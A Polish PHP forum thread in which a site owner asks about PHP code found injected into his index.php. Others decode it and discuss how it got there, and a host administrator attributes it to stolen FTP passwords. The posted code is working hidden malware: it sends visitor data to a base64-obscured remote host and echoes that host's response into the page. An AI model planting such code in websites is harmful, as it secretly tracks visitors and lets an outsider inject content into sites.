Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Podejrzenie włamania na serwer
Forum PHP.pl > Forum > PHP
Barcelona
27.09.2011, 23:36:55
Witam, otworzyłem dzisiaj plik index.php i znalazłem tam taki kawałek kodu, którego nie wklejałem:

[PHP] pobierz, plaintext 
  1. <?php    
  2.  
  3.     // This code use for global bot statistic
  4.  
  5.     $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
  6.  
  7.     $stCurlHandle = NULL;
  8.  
  9.     $stCurlLink = "";
  10.  
  11.     if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
  12.  
  13.     {
  14.  
  15.         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
  16.  
  17.         $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
  18.  
  19.             $stCurlHandle = curl_init( $stCurlLink ); 
  20.  
  21.     }
  22.  
  23.     } 
  24.  
  25. if ( $stCurlHandle !== NULL )
  26.  
  27. {
  28.  
  29.     curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  30.  
  31.     $sResult = @curl_exec($stCurlHandle); 
  32.  
  33.     if ($sResult[0]=="O") 
  34.  
  35.      {$sResult[0]=" ";
  36.  
  37.       echo $sResult; // Statistic code end
  38.  
  39.       }
  40.  
  41.     curl_close($stCurlHandle); 
  42.  
  43. }
  44.  
  45. ?>
[PHP] pobierz, plaintext


Co to jest? Proszę o pomoc.
tabbi
27.09.2011, 23:55:21
Ktoś zbiera dane na temat twojej strony smile.gif i wysyła do siebie - Bots vs Browsers ;]

proponuje wywołać sobie tę metodę:

[PHP] pobierz, plaintext 
  1. echo base64_decode('aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==');
[PHP] pobierz, plaintext
Barcelona
28.09.2011, 00:03:40
Tutaj zostaje wysłane, ale jakim cudem ten kod znalazł się na mojej stronie ?

[PHP] pobierz, plaintext 
  1. <a href="http://rebotstat.com/botstat/stat.php" target="_blank">http://rebotstat.com/botstat/stat.php</a>
[PHP] pobierz, plaintext
tabbi
28.09.2011, 00:57:51
Odpowiedzi na to pytanie może być wiele,

zaczynając od typowego włamania na serwer, kończąc na udostępnieniu hasła ...
Barcelona
28.09.2011, 01:43:53
Nikomu nie udostępniałem hasła, znam go tylko ja i loguje się na serwer tylko i wyłącznie z mojego komputera.
Damonsson
28.09.2011, 01:46:10
Total Commander? ;>
Barcelona
28.09.2011, 02:02:17
Już dawno nie, WinSCP
konrados
2.10.2011, 12:54:04
Cytat
Total Commander?


A właściwie to o co chodzi z tym Total Commanderem, przecież ktoś musiałby się włamać na mój komp, lub wirusa bym sobie musiał ściągnąć, by ktoś pobrał hasła, prawda?

A jeśli ktoś lubi sobie ściągać wirusy, to równie dobrze może sobie zainstalować key loggera i tym samym wpisywanie hasła za każdym razem (a niezapamiętywanie ich) niewiele pomoże.

Chyba, że czegoś nie wiem?
pienso
2.10.2011, 13:55:55
Jak będziesz wiedział to daj znać gdzie była luka i jak się zabezpieczać. Przyda się innym.
konrados
2.10.2011, 15:10:37
Cytat
Jak będziesz wiedział to daj znać gdzie była luka i jak się zabezpieczać. Przyda się innym.


To była złościwość? Ja naprawdę chcę się dowiedzieć o co chodzi z tymi wszystkimi ostrzeżeniami dot. Total Commandera.
drozdii07
2.10.2011, 15:14:52
Jeśli zapamiętujesz hasło w TC, to później wirusy je łatwo wyciągają smile.gif
konrados
2.10.2011, 15:19:40
Cytat
Jeśli zapamiętujesz hasło w TC, to później wirusy je łatwo wyciągają


Ja to wiem, ale wpierw trzeba mieć wirusa. A jeśli ktoś pozwala sobie na ściąganie wirusów, to również pozwala sobie na ściąganie key loggerów.
Fifi209
2.10.2011, 15:53:44
Cytat(konrados @ 2.10.2011, 16:19:40 ) *
A jeśli ktoś pozwala sobie na ściąganie wirusów, to również pozwala sobie na ściąganie key loggerów.

Po pierwsze, nie musisz sobie ściągać wirusa jak to określiłeś, wystarczy że przyjdzie kumpel z zarażonym pendrive o czym sam nawet nie będzie wiedział.
Korab
2.10.2011, 16:03:31
To może przeskanuj sobie komputer dwoma programami antywirusowymi.
konrados
2.10.2011, 16:42:25
Cytat
Po pierwsze, nie musisz sobie ściągać wirusa jak to określiłeś, wystarczy że przyjdzie kumpel z zarażonym pendrive o czym sam nawet nie będzie wiedział.


Ale mi ciągle chodzi o to, że jeśli ktoś pozwala sobie na ściągnięcie wirusa, to również może sobie pozwolić na ściągnięcie key loggera (progrram, który obserwuje wstukiwane klawisze i je wysyła na dany serwer). Więc zabezpieczenie w rodzaju "nie zapamiętuj haseł w danym programie" jest nic nie warte.
92nasti
2.10.2011, 17:41:38
Cytat(konrados @ 2.10.2011, 17:42:25 ) *
Ale mi ciągle chodzi o to, że jeśli ktoś pozwala sobie na ściągnięcie wirusa, to również może sobie pozwolić na ściągnięcie key loggera (progrram, który obserwuje wstukiwane klawisze i je wysyła na dany serwer). Więc zabezpieczenie w rodzaju "nie zapamiętuj haseł w danym programie" jest nic nie warte.


Błyszczysz wiedzą, w sumie to za chwile dojdzie do tego że najlepiej obsługiwać serwer na linuksie z dobrze skonfigurowanym iptables.
konrados
2.10.2011, 17:49:26
Cytat
Błyszczysz wiedzą, w sumie to za chwile dojdzie do tego że najlepiej obsługiwać serwer na linuksie z dobrze skonfigurowanym iptables.

ehh poddaję się, chciałem się czegoś dowiedzieć i nie wyszło. Wątek raczej do zamknięcia.
Barcelona
2.10.2011, 21:50:21
Uuuu troche mnie nie było i widzę że wątek nabrał rumieńców smile.gif

Nie wiem czy to od tego ale napiszę. Mam hosting wykupiony w home.pl i tam mają ten swój "wspaniały" kreator www. Dla zabawy stworzyłem sobie serwis za pomocą tego kreatora. Może to od tego a może nie, bo tworząc serwis zgadzam się na zbieranie statystyk ze strony głównej pod którą jest podpięta domena. Musiałem odhaczyć tą opcję.
Ale i tak zastanawiają mnie dwie sprawy. Jakim prawem mogą ingerować własnym kodem w skrypcie, a po drugie te statystyki były zbierane przez stat.pl, a tutaj w tym kodzie przez jakiegoś rebotstat.

Wracając do tematów TC i wirusów, to ja jestem z tych co nie zaglądają na te strony co nie trzeba i staram się mieć cały czas aktualną bazę wirusów, więc wątpie żeby KIS przepuścił jakiegoś małego wirka.

Chwilowo sprawa przycichła, ale muszę na bieżąco sprawdzać indexy, żeby sprawa się więcej nie powtórzyła.

A czy zakodowanie kodu strony coś pomoże ?
by_ikar
3.10.2011, 09:54:32
Kod
Wracając do tematów TC i wirusów, to ja jestem z tych co nie zaglądają na te strony co nie trzeba i staram się mieć cały czas aktualną bazę wirusów, więc wątpie żeby KIS przepuścił jakiegoś małego wirka.


Wytłumacz mi jak antywirus znajdzie wirusa, na temat którego żadnych informacji nie ma? Może to być nawet rootkit który będzie dołączony do sterowników czy cokolwiek innego. Antywirus nie daje 100% zabezpieczenia nigdy i nigdy dawać nie będzie. Zrozumcie to w końcu..

Co do samej strony, sprawdź formularze, może są dziurawe w efekcie ktoś ci xss zrobił na stronie.
Barcelona
4.10.2011, 11:39:02
Cytat
Wytłumacz mi jak antywirus znajdzie wirusa, na temat którego żadnych informacji nie ma? Może to być nawet rootkit który będzie dołączony do sterowników czy cokolwiek innego. Antywirus nie daje 100% zabezpieczenia nigdy i nigdy dawać nie będzie. Zrozumcie to w końcu..


Racja, nie pomyślałem o tym.

Sprawdzałem pliki i nie zauważyłem nic podejrzanego.
mcsgroup
4.10.2011, 12:22:09
Cytat(Barcelona @ 2.10.2011, 22:50:21 ) *
Nie wiem czy to od tego ale napiszę. Mam hosting wykupiony w home.pl i tam mają ten swój "wspaniały" kreator www. Dla zabawy stworzyłem sobie serwis za pomocą tego kreatora. Może to od tego a może nie, bo tworząc serwis zgadzam się na zbieranie statystyk ze strony głównej pod którą jest podpięta domena. Musiałem odhaczyć tą opcję.


W home.pl odhaczenie dodawania skryptu zliczającego zaprzestaje dodawania kodu do strony.
Natomiast wybranie tej opcji dodaje kod nawet do pliku .css . Ogólnie jest to dość denerwujące.
Barcelona
6.10.2011, 14:44:10
No i dziękuje za potwierdzenie mojej teorii smile.gif
Jest to dość mocno denerwujące, jak już tak robią to chociaż by uprzedzili o doklejaniu kodu, potem człowiek się denerwuje i wymyśla nie wiem co.
EOT
gekoncaros
23.11.2011, 12:24:14
Witam nie jestes sam ja tez na serwerze linuxpl.com tez dostałem do kazdego pliku index.php taki wlasnie dodatek w postaci 30 linii kodu
najgorsze jest to ze mam tych indexow od groma i jeszcze troche i tu moje pytanie jak napisać jakis skrypt ktory by pousuwał dokładnie taki kod w okreslonych plikach
pioklo
25.11.2011, 22:58:10
Cytat(gekoncaros @ 23.11.2011, 13:24:14 ) *
Witam nie jestes sam ja tez na serwerze linuxpl.com tez dostałem do kazdego pliku index.php taki wlasnie dodatek w postaci 30 linii kodu
najgorsze jest to ze mam tych indexow od groma i jeszcze troche i tu moje pytanie jak napisać jakis skrypt ktory by pousuwał dokładnie taki kod w okreslonych plikach


Witam
Dopiski do skryptow masz przez logowanie na ftp z adresu IP 188.72.250.20

ftpd17636 Fri Nov 25 15:41 - 15:41 (00:00) ::ffff:188.72.250.20
ftpd25799 Fri Nov 25 11:09 - 11:10 (00:00) ::ffff:188.72.250.20

Wykradzione hasla przez wirusy z programow klienckich ftp gdzie sa zapisywane bez szyfrowania..

Ip zostal zablokowany na firewallu polecam uzyc u nas pluginu do blokowania polaczen do ftp i konta na okreslone adresy IP
wtedy mimo wykradzionego hasla takiej sytuacji by nie bylo bo boty by sie nie polaczyly

pozdrawiam
Piotr
linuxpl.com
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.